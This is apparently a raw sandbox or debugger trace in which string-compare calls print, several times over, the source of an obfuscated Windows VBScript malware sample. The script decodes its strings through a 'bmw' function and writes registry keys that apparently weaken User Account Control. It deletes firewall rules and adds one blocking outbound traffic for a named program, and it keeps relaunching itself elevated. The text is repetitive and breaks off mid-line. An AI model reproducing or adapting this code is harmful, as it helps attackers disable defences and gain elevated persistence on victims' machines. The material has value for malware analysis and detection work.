bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.990] wcsncmp (_String1="(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.990] wcsncmp (_String1="bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0222.990] wcsncmp (_String1="mw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0222.990] wcsncmp (_String1="w(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0222.990] wcsncmp (_String1="(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 